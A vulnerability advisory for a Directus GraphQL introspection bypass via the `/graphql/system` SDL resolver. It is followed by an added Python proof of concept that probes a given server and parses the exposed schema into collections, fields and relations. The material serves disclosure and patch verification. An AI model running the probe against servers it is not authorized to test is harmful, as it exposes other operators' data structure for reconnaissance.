CVE-2026-35413
Severity: MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Description
## Summary

When `GRAPHQL_INTROSPECTION=false` is configured, Directus correctly blocks standard GraphQL introspection queries (`__schema`, `__type`). However, the `server_specs_graphql` resolver on the `/graphql/system` endpoint returns an equivalent SDL representation of the schema and was not subject to the same restriction. This allowed the introspection control to be bypassed, exposing schema structure (collection names, field names, types, and relationships) to unauthenticated users at the public permission level, and to authenticated users at their permitted permission level.

## Impact

Administrators who set `GRAPHQL_INTROSPECTION=false` to hide schema structure from clients would have had a false sense of security, as equivalent schema information remained accessible via the SDL endpoint without authentication.

## Credit

This vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).
Analysis
Directus allows information disclosure of GraphQL schema structure via the `/graphql/system` endpoint when `GRAPHQL_INTROSPECTION=false` is configured, exposing collection names, field names, types, and relationships to unauthenticated users and authenticated users at their permission level. The vulnerability bypasses the introspection control mechanism by returning an equivalent SDL (Schema Definition Language) representation through the `server_specs_graphql` resolver, giving administrators a false sense of security while schema information remains publicly accessible.
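The probe below is an added example, not code from the advisory or from Directus. It sends the standard introspection query to `/graphql` and the `server_specs_graphql` query named above to `/graphql/system`, then reports the bypass condition described on this page: introspection refused while the SDL query still returns a schema. It also parses the returned SDL into collections, fields and relations, which is exactly what `GRAPHQL_INTROSPECTION=false` was meant to withhold. Assumptions not stated on the page: the bare query `{ server_specs_graphql }` with no argument (adjust if your server reports a required argument), `/graphql` as the path for the introspection probe, and the constructed sample responses used when no URL is given.

```python
"""Probe a Directus instance for the introspection bypass (added example)."""
import json
import re
import sys
import urllib.error
import urllib.request

# Standard introspection query that GRAPHQL_INTROSPECTION=false is meant to block.
INTROSPECTION_QUERY = "{ __schema { types { name } } }"
# Query named on the page; the argument-less form is an assumption.
SDL_QUERY = "{ server_specs_graphql }"

# Minimal SDL parsing: `type Name ... { fields }` blocks and `field(args): Type` lines.
TYPE_BLOCK = re.compile(r"\btype\s+(\w+)[^{]*\{([^}]*)\}", re.S)
FIELD = re.compile(r"^\s*(\w+)\s*(?:\([^)]*\))?\s*:\s*([\[\]\w!]+)", re.M)


def graphql_post(url, query, token=None, timeout=10):
    """POST one GraphQL query and return the decoded JSON body, errors included."""
    body = json.dumps({"query": query}).encode()
    headers = {"Content-Type": "application/json"}
    if token:
        headers["Authorization"] = f"Bearer {token}"
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return json.loads(resp.read())
    except urllib.error.HTTPError as exc:  # 4xx responses still carry a JSON body
        return json.loads(exc.read() or b"{}")


def introspection_blocked(resp):
    """True when the server refused __schema (null data or an errors entry)."""
    return not (resp.get("data") or {}).get("__schema")


def extract_schema(sdl):
    """Parse SDL text into {type_name: {field_name: field_type}}."""
    return {name: dict(FIELD.findall(body)) for name, body in TYPE_BLOCK.findall(sdl)}


def relations(schema):
    """(source_type, field, target_type) for fields typed as another object type."""
    out = []
    for src, fields in schema.items():
        for field, ftype in fields.items():
            target = ftype.strip("[]!")  # unwrap list/non-null markers
            if target in schema:
                out.append((src, field, target))
    return out


def assess(intro_resp, sdl_resp):
    """'introspection-open', 'sdl-bypass' (the bug on this page) or 'hardened'."""
    if not introspection_blocked(intro_resp):
        return "introspection-open"
    sdl = (sdl_resp.get("data") or {}).get("server_specs_graphql")
    if isinstance(sdl, str) and extract_schema(sdl):
        return "sdl-bypass"
    return "hardened"


def probe(base_url, token=None):
    """Live check; no token means the public role. Returns (verdict, schema)."""
    base = base_url.rstrip("/")
    intro = graphql_post(f"{base}/graphql", INTROSPECTION_QUERY, token)
    sdl_resp = graphql_post(f"{base}/graphql/system", SDL_QUERY, token)
    sdl = (sdl_resp.get("data") or {}).get("server_specs_graphql") or ""
    return assess(intro, sdl_resp), extract_schema(sdl)


# Constructed sample responses standing in for a live server (not real Directus output).
SAMPLE_INTROSPECTION_RESPONSE = {
    "errors": [{"message": "introspection disabled (constructed message)"}],
    "data": None,
}
SAMPLE_SDL = """
type articles {
  id: ID!
  title: String
  author(filter: directus_users_filter): directus_users
  tags: [tags]
}
type directus_users {
  id: ID!
  email: String
}
type tags {
  id: ID!
  name: String
}
"""
SAMPLE_SDL_RESPONSE = {"data": {"server_specs_graphql": SAMPLE_SDL}}

if __name__ == "__main__":
    if len(sys.argv) > 1:
        verdict, schema = probe(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None)
    else:
        verdict = assess(SAMPLE_INTROSPECTION_RESPONSE, SAMPLE_SDL_RESPONSE)
        schema = extract_schema(SAMPLE_SDL)
    print(verdict, sorted(schema))
    for src, field, target in relations(schema):
        print(f"  {src}.{field} -> {target}")
```

Run it unauthenticated to test the public role and again with a low-privilege token for an authenticated role; after upgrading to a release covered by the linked GHSA, expect `hardened` in both cases. The SDL parser is deliberately minimal and skips `input`, `enum` and `interface` definitions, since those are not collections.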
External POC / Exploit Code
GHSA-wxwm-3fxv-mrvx